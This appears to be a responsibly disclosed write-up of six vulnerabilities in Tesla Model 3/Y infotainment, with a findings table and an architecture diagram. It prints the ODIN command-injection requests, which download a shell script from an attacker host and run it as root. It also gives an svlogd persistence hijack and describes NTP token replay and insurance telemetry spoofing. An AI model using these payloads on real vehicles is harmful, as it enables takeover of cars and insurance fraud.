
Vulnerability research on Tesla Model 3/Y infotainment systems. 6 vulnerabilities, 4 CVEs (CVE-2022-42005 through CVE-2022-42008). Root shell, persistent access, insurance telemetry spoofing.
Vulnerability research on the Tesla Model 3/Y infotainment system (Intel Atom MCU, Linux 4.14.235), responsibly disclosed to Tesla via Bugcrowd.
Obtained persistent root access on a production Tesla Model 3 through a command injection vulnerability in Tesla's ODIN diagnostic interface (CVE-2022-42008). From there, discovered five additional vulnerabilities — including a persistence method that survives firmware updates (CVE-2022-42005, CVE-2022-42006) and a method to spoof Safety Score insurance telemetry that directly reduced monthly premiums from $130 to $83.
Six vulnerabilities across ODIN, hermes, and Safety Score. Four CVEs. Rewarded via Bugcrowd and enrolled in Tesla's SSH Security Researcher program.
| Finding | CVE | Impact | Status | Reward |
|---|---|---|---|---|
| Root Shell via ODIN | CVE-2022-42008 | Root shell via command injection | Fixed (2021.32.10) | Bugcrowd bounty |
| Expired ODIN Tokens | CVE-2022-42007 | Token replay via NTP spoofing | Fixed (2021.32.10) | Bugcrowd bounty |
| Upload to Mothership | — | Arbitrary file upload to Tesla servers | Marked N/A | — |
| Log Backshell + DV Access | CVE-2022-42005, CVE-2022-42006 | Persistent access surviving firmware updates | Fixed | Bugcrowd bounty |
| Insurance Telemetry Spoofing | — | Spoofed Safety Score reduces insurance premiums | No fix confirmed | — |
| Unfuse ODIN | — | Any ODIN task without authentication | No fix confirmed | — |
The Tesla Model 3/Y infotainment system (Intel Atom MCU) runs a Linux-based OS with several attack surfaces identified during this research:
┌──────────────────────────────────────────────────────────┐
│ Tesla Model 3 MCU (Intel) │
│ │
│ ┌────────────┐ ┌──────────────┐ ┌──────────────────┐ │
│ │ ODIN │ │ QtCarServer │ │ hermes │ │
│ │ │ │ │ │ (proxy+client) │ │
│ │ CVE-42008 │ │ prototype_ │ │ │ │
│ │ (cmd inj) │ │ server │ │ Uploads to │ │
│ │ │ │ CVE-42006 │ │ Mothership │ │
│ │ Report 06 │ │ (data vals) │ │ [Report 03] │ │
│ │ (is-fused │ │ │ │ [Report 05] │ │
│ │ bypass) │ └──────────────┘ └────────┬─────────┘ │
│ └──────┬─────┘ │ │
│ │ ┌──────────────┐ │ │
│ │ │ svlogd │ │ │
│ │ │ Log Rotation │ │ │
│ │ │ CVE-42005 │ │ │
│ │ │ (persistence)│ │ │
│ │ └──────────────┘ │ │
└─────────┼───────────────────────────────────┼────────────┘
│ │
┌─────┴───────┐ ┌───────┴──────────┐
│ Toolbox │ │ Mothership │
│ API │ │ Server │
│ │ │ │
│ CVE-42007 │ │ File uploads │
│ (expired │ │ Telemetry data │
│ tokens) │ │ │
└─────────────┘ └──────────────────┘
Full reports: Root Shell via ODIN | Log Backshell + DV Access
The ODIN diagnostic interface exposes a task called TEST_DIGITAL-MICS_X_FUNCTIONAL-CHECK that accepts a MicTest-Input parameter — a list of strings passed directly to CID_EXEC for execution as root. Any subscriber with the lowest Toolbox access level (tbx-external) can trigger this task by connecting to the car's diagnostic port and sending a POST request. The input strings are executed verbatim, so the attack is two requests: first, download a reverse shell script onto the car via curl:
{
"args": {
"kw": {
"MicTest-Input": ["curl", "http://<ATTACKER_IP>/shell.sh", "-o", "/home/tesla/shell.sh"]
},
"name": "Model3/tasks/TEST_DIGITAL-MICS_X_FUNCTIONAL-CHECK"
},
"command": "execute"
}
Then execute it:
{
"args": {
"kw": {
"MicTest-Input": ["/bin/sh", "/home/tesla/shell.sh"]
},
"name": "Model3/tasks/TEST_DIGITAL-MICS_X_FUNCTIONAL-CHECK"
},
"command": "execute"
}
With a root shell established, persistent access is achieved by hijacking the svlogd log rotation configuration. The standard gzip compression command is replaced with a script that opens a backshell under the log account each time logs rotate:
!sh /var/log/wpa_supplicant/gzip.sh -c
The config file is made immutable with chattr +i, ensuring it survives firmware updates. While the log account cannot use the standard sdv command to set data values (dbus rejects it), Tesla's dormant prototype_server provides unrestricted websocket access to all data values when enabled via settings.conf. A custom set of shell scripts (sdv, lv, send.sh) emulate a websocket client to interact with this server.
The full persistence toolkit is controlled through the car's Access Code input box (visible by long-pressing the car model on the touchscreen), which is monitored by a listener script that dispatches commands — including opening backshells, setting data values, and toggling service modes.
Tesla's ODIN token generation endpoint accepts expired tbx-tokens and — critically — also returns the user's tbx-token in the response, enabling token leakage through sharing. Expired ODIN tokens are normally rejected by the vehicle, but by spoofing the car's NTP time source using ARP-based interception (ntpspoof.py), the vehicle can be tricked into accepting tokens past their expiration date. The gateway detects NTP tampering (GTW_w149_rtcTimeSetInPast) but does not act on this signal.